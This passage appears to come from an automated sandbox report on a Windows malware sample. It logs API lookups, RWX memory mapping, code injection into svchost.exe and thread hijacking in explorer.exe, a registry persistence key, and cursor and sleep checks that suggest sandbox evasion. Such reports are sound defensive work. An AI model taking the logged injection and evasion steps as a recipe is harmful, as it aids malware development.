|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x771afde8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x77141e1d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x74d44761 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x74d3cd11 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x74d4424f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | address_out = 0x74d446b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetDateFormatEx, address_out = 0x74d56676 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x74d44751 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTimeFormatEx, address_out = 0x74d565f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x74d447c1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsValidLocaleName, address_out = 0x74d447e1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LCMapStringEx, address_out = 0x74d447f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentPackageId, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTickCount64, address_out = 0x74cdeee0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtect, address_out = 0x74cc435f |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLastError, address_out = 0x74cc11c0 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapCreate, address_out = 0x74cc4a2d |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleHandleA, address_out = 0x74cc1245 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitThread, address_out = 0x7712d598 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetProcAddress, address_out = 0x74cc1222 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapAlloc, address_out = 0x770fe026 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LoadLibraryA, address_out = 0x74cc49d7 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateEventA, address_out = 0x74cc328c |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapFree, address_out = 0x74cc14c9 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WaitForSingleObject, address_out = 0x74cc1136 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEvent, address_out = 0x74cc16c5 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameW, address_out = 0x74cc4950 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualFree, address_out = 0x74cc186e |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CloseHandle, address_out = 0x74cc1410 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenA, address_out = 0x74cc5a4b |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateThread, address_out = 0x74cc34d5 |
|
2 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualAlloc, address_out = 0x74cc1856 |
|
2 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memcpy, address_out = 0x770f2340 |
|
2 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = memset, address_out = 0x770fdf20 |
|
2 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwQueryInformationToken, address_out = 0x770efb98 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwQueryInformationProcess, address_out = 0x770efac8 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtCreateSection, address_out = 0x770eff94 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtMapViewOfSection, address_out = 0x770efc40 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtUnmapViewOfSection, address_out = 0x770efc70 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwClose, address_out = 0x770ef9d0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlNtStatusToDosError, address_out = 0x771061ed |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcessToken, address_out = 0x770f10b0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQuerySystemInformation, address_out = 0x770efda0 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = mbstowcs, address_out = 0x7714a152 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlUpcaseUnicodeString, address_out = 0x7712b49f |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlFreeUnicodeString, address_out = 0x770fe126 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwOpenProcess, address_out = 0x770efc10 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = RtlUnwind, address_out = 0x77116d39 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = NtQueryVirtualMemory, address_out = 0x770efbc8 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindExtensionA, address_out = 0x7519eced |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = PathCombineW, address_out = 0x7518c39c |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindExtensionW, address_out = 0x7518a1b9 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrChrA, address_out = 0x7517c5e6 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrRChrA, address_out = 0x7517ccf5 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = PathFindFileNameW, address_out = 0x7518bb71 |
|
1 | |
| Get Address | c:\windows\syswow64\shlwapi.dll | function = StrStrIW, address_out = 0x751846e9 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateWaitableTimerA, address_out = 0x74d44c24 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateProcessA, address_out = 0x74cc1072 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileMappingW, address_out = 0x74cc1909 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetWaitableTimer, address_out = 0x74cebb2f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileW, address_out = 0x74cc3f5c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MoveFileExW, address_out = 0x74cd9b2d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileSize, address_out = 0x74cc196e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrlenW, address_out = 0x74cc1700 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Sleep, address_out = 0x74cc10ff |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpiW, address_out = 0x74cdd5cd |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatW, address_out = 0x74ce828e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = DeleteFileW, address_out = 0x74cc89b3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = MapViewOfFile, address_out = 0x74cc18f1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResetEvent, address_out = 0x74cc16dd |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SleepEx, address_out = 0x74cc1215 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedDecrement, address_out = 0x74cc13f0 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = InterlockedIncrement, address_out = 0x74cc1400 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = HeapDestroy, address_out = 0x74cc35b7 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetSystemTimeAsFileTime, address_out = 0x74cc3509 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExitProcess, address_out = 0x74cc7a10 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempPathA, address_out = 0x74ce276c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentThreadId, address_out = 0x74cc1450 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetTempFileNameA, address_out = 0x74ce9d3f |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetFileTime, address_out = 0x74cc4407 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindNextFileA, address_out = 0x74ced53e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CompareFileTime, address_out = 0x74cc1b25 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindClose, address_out = 0x74cc4442 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FindFirstFileA, address_out = 0x74cce2ce |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ExpandEnvironmentStringsA, address_out = 0x74cdeb39 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateFileA, address_out = 0x74cc53c6 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = OpenProcess, address_out = 0x74cc1986 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SuspendThread, address_out = 0x74ce7d7e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ResumeThread, address_out = 0x74cc43ef |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = VirtualProtectEx, address_out = 0x74d445bf |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpiA, address_out = 0x74cc3e8e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyA, address_out = 0x74ce2a9d |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcmpA, address_out = 0x74cdeceb |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetVersion, address_out = 0x74cc4467 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetCurrentProcessId, address_out = 0x74cc11f8 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetLongPathNameW, address_out = 0x74cca315 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetEndOfFile, address_out = 0x74cdce2e |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpyW, address_out = 0x74ce3102 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcatA, address_out = 0x74ce2b7a |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CreateDirectoryW, address_out = 0x74cc4259 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = FlushFileBuffers, address_out = 0x74cc469b |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = WriteFile, address_out = 0x74cc1282 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = LocalFree, address_out = 0x74cc2d3c |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = lstrcpynA, address_out = 0x74cd192a |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetFilePointer, address_out = 0x74cc17d1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = ReadFile, address_out = 0x74cc3ed3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = GetModuleFileNameA, address_out = 0x74cc14b1 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetLastError, address_out = 0x74cc11a9 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfW, address_out = 0x755ae061 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = wsprintfA, address_out = 0x7559ae5f |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetCursorPos, address_out = 0x75591218 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCreateKeyA, address_out = 0x750dcd01 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyW, address_out = 0x750e2459 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegDeleteValueW, address_out = 0x750dcf31 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegEnumKeyExA, address_out = 0x750e1481 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetTokenInformation, address_out = 0x750e431c |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthorityCount, address_out = 0x750e0e0c |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegSetValueExA, address_out = 0x750e14b3 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExA, address_out = 0x750e48ef |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = ConvertStringSecurityDescriptorToSecurityDescriptorA, address_out = 0x750dca94 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = OpenProcessToken, address_out = 0x750e4304 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyExA, address_out = 0x750e4907 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegQueryValueExW, address_out = 0x750e46ad |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegCloseKey, address_out = 0x750e469d |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = GetSidSubAuthority, address_out = 0x750e0e24 |
|
1 | |
| Get Address | c:\windows\syswow64\advapi32.dll | function = RegOpenKeyA, address_out = 0x750dcc15 |
|
1 | |
| Get Address | c:\windows\syswow64\shell32.dll | function = ShellExecuteExW, address_out = 0x758c1e46 |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoInitializeEx, address_out = 0x769009ad |
|
1 | |
| Get Address | c:\windows\syswow64\ole32.dll | function = CoUninitialize, address_out = 0x769086d3 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsWow64Process, address_out = 0x74cc195e |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = FindWindowA, address_out = 0x7558ffe6 |
|
1 | |
| Get Address | c:\windows\syswow64\user32.dll | function = GetWindowThreadProcessId, address_out = 0x755891b4 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = Wow64EnableWow64FsRedirection, address_out = 0x74cdebe8 |
|
1 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwWow64QueryInformationProcess64, address_out = 0x770f20dc |
|
8 | |
| Get Address | c:\windows\syswow64\ntdll.dll | function = ZwWow64ReadVirtualMemory64, address_out = 0x770f20f4 |
|
1 | |
| Create Mapping | C:\Users\Public\229393.exe | filename = C:\Users\Public\229393.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Create Mapping | - | protection = PAGE_EXECUTE_READWRITE, maximum_size = 40826360 |
|
1 | |
| Map | C:\Users\Public\229393.exe | process_name = c:\users\public\229393.exe, desired_access = FILE_MAP_READ |
|
1 | |
| Map | - | process_name = c:\users\public\229393.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x2430000 |
|
1 | |
| Map | - | process_name = C:\Windows\system32\svchost.exe, protection = PAGE_EXECUTE_READWRITE, address_out = 0x140000 |
|
1 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Find | - | class_name = ProgMan |
|
1 |
System (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 471, y_out = 474 |
|
1 | |
| Get Cursor | x_out = 631, y_out = 474 |
|
38 | |
| Get Cursor | x_out = 791, y_out = 474 |
|
6 | |
| Sleep | duration = 23207 milliseconds (23.207 seconds) |
|
1 | |
| Get Time | type = System Time, time = 2018-03-29 15:43:21 (UTC) |
|
2 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| Get Info | type = Operating System |
|
1 | |
| Get Info | type = SYSTEM_PROCESS_INFORMATION |
|
1 |
Environment (2)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = Fats |
|
1 |
Ini (2)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Read | Win.ini | section_name = windows, key_name = DragMinDist, default_value = 2, data_out = 2 |
|
1 | |
| Read | Win.ini | section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200 |
|
1 |
Process #5: svchost.exe
261
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\windows\system32\svchost.exe |
| Command Line | C:\Windows\system32\svchost.exe |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:01:47, Reason: Child Process |
| Unmonitor | End Time: 00:02:33, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:46 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x76c |
| Parent PID | 0x8f8 (c:\users\public\229393.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
960
0x
8D8
0x
8D0
0x
8D4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x000affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x000d0000 | 0x00136fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000140000 | 0x00140000 | 0x001c8fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001d1fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d6fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000001e0000 | 0x001e0000 | 0x001effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x008fffff | Private Memory | Readable, Writable |
|
|
|
- |
| imm32.dll | 0x00400000 | 0x00428fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x0000000000400000 | 0x00400000 | 0x00400fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x00410fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000420000 | 0x00420000 | 0x004a8fff | Pagefile Backed Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000000500000 | 0x00500000 | 0x008fffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000990000 | 0x00990000 | 0x00a0ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x00b97fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000ba0000 | 0x00ba0000 | 0x00d20fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000d30000 | 0x00d30000 | 0x0212ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000002130000 | 0x02130000 | 0x02522fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| sortdefault.nls | 0x02530000 | 0x027fefff | Memory Mapped File | Readable |
|
|
|
- |
| kernel32.dll | 0x76cd0000 | 0x76deefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x76df0000 | 0x76ee9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x76ef0000 | 0x77098fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| psapi.dll | 0x770b0000 | 0x770b6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
- |
| private_0x000000007fffa000 | 0x7fffa000 | 0x7fffafff | Private Memory | Readable, Writable |
|
|
|
- |
| svchost.exe | 0xffba0000 | 0xffbaafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sspicli.dll | 0x7fefcd00000 | 0x7fefcd24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefcef0000 | 0x7fefcf5afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefd210000 | 0x7fefd2aefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7fefd420000 | 0x7fefd44dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7fefe460000 | 0x7fefe568fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7fefe590000 | 0x7fefe600fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefe740000 | 0x7fefe7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefe7b0000 | 0x7fefe7cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefe7d0000 | 0x7fefe7ddfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefe7e0000 | 0x7fefe90cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefed50000 | 0x7fefee18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7feff120000 | 0x7feff1fafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feff210000 | 0x7feff210fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Injection Information
| Injection Type | Source Process | Source Os Thread ID | Information | Success | Count | Logfile |
|---|---|---|---|---|---|---|
| Modify Memory | #4: c:\users\public\229393.exe | 0x7e8 | address = 0x140000, size = 561152 |
|
1 | |
| Modify Memory | #4: c:\users\public\229393.exe | 0x7e8 | address = 0x20000, size = 792 |
|
1 | |
| Modify Control Flow | #4: c:\users\public\229393.exe | 0x7e8 | os_tid = 0x960, address = 0xfffdf000 |
|
1 | |
| Modify Memory | #4: c:\users\public\229393.exe | 0x7e8 | address = 0xffba246c, size = 4 |
|
1 |
Host Behavior
File (6)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\SYSTEM32\ntdll.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
3 | |
| Read | C:\Windows\SYSTEM32\ntdll.dll | size = 4, size_out = 4 |
|
3 |
Registry (5)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | value_name = Ini, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | value_name = Client, data = 2, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\3632F5D8-1D04-D8B6-57CA-A18C7B9E6580 | value_name = Client, size = 40, type = REG_BINARY |
|
1 |
Process (22)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | c:\windows\system32\svchost.exe | type = PROCESS_BASIC_INFORMATION |
|
20 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Open | c:\windows\explorer.exe | desired_access = PROCESS_TERMINATE, PROCESS_CREATE_THREAD, PROCESS_SET_SESSIONID, PROCESS_VM_OPERATION, PROCESS_VM_READ, PROCESS_VM_WRITE, PROCESS_DUP_HANDLE, PROCESS_CREATE_PROCESS, PROCESS_SET_QUOTA, PROCESS_SET_INFORMATION, PROCESS_QUERY_INFORMATION, PROCESS_SUSPEND_RESUME, DELETE, READ_CONTROL, WRITE_DAC, WRITE_OWNER, SYNCHRONIZE |
|
1 |
Thread (7)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | c:\windows\explorer.exe | proc_address = 0x76f36930, proc_parameter = 0, flags = THREAD_CREATE_SUSPENDED |
|
1 | |
| Suspend | c:\windows\explorer.exe | os_tid = 0x8cc |
|
1 | |
| Get Context | c:\windows\explorer.exe | os_tid = 0x8cc |
|
2 | |
| Set Context | c:\windows\explorer.exe | os_tid = 0x8cc |
|
1 | |
| Resume | c:\windows\explorer.exe | os_tid = 0x8cc |
|
2 |
Memory (9)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Allocate | c:\windows\explorer.exe | address = 0xaee10, allocation_type = MEM_COMMIT, MEM_RESERVE, protection = PAGE_EXECUTE_READWRITE, size = 716312 |
|
1 | |
| Protect | c:\windows\explorer.exe | address = 0x76f36930, protection = PAGE_EXECUTE_READWRITE, size = 4 |
|
2 | |
| Protect | c:\windows\explorer.exe | address = 0x76f36930, protection = PAGE_EXECUTE_READ, size = 4 |
|
2 | |
| Read | c:\windows\explorer.exe | address = 0x76f36930, size = 4 |
|
1 | |
| Write | c:\windows\explorer.exe | address = 0x76f36930, size = 4 |
|
2 | |
| Write | c:\windows\explorer.exe | address = 0x2950000, size = 792 |
|
1 |
Module (198)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | ntdll.dll | base_address = 0x0 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x0 |
|
1 | |
| Load | ADVAPI32.dll | base_address = 0x7feff120000 |
|
1 | |
| Load | SHLWAPI.dll | base_address = 0x7fefe590000 |
|
1 | |
| Load | USER32.dll | base_address = 0x76df0000 |
|
1 | |
| Load | PSAPI.DLL | base_address = 0x770b0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x76cd0000 |
|
5 | |
| Get Handle | c:\windows\system32\ntdll.dll | base_address = 0x76ef0000 |
|
3 | |
| Get Handle | c:\windows\system32\kernelbase.dll | base_address = 0x7fefcef0000 |
|
1 | |
| Get Handle | c:\windows\system32\advapi32.dll | base_address = 0x7feff120000 |
|
1 | |
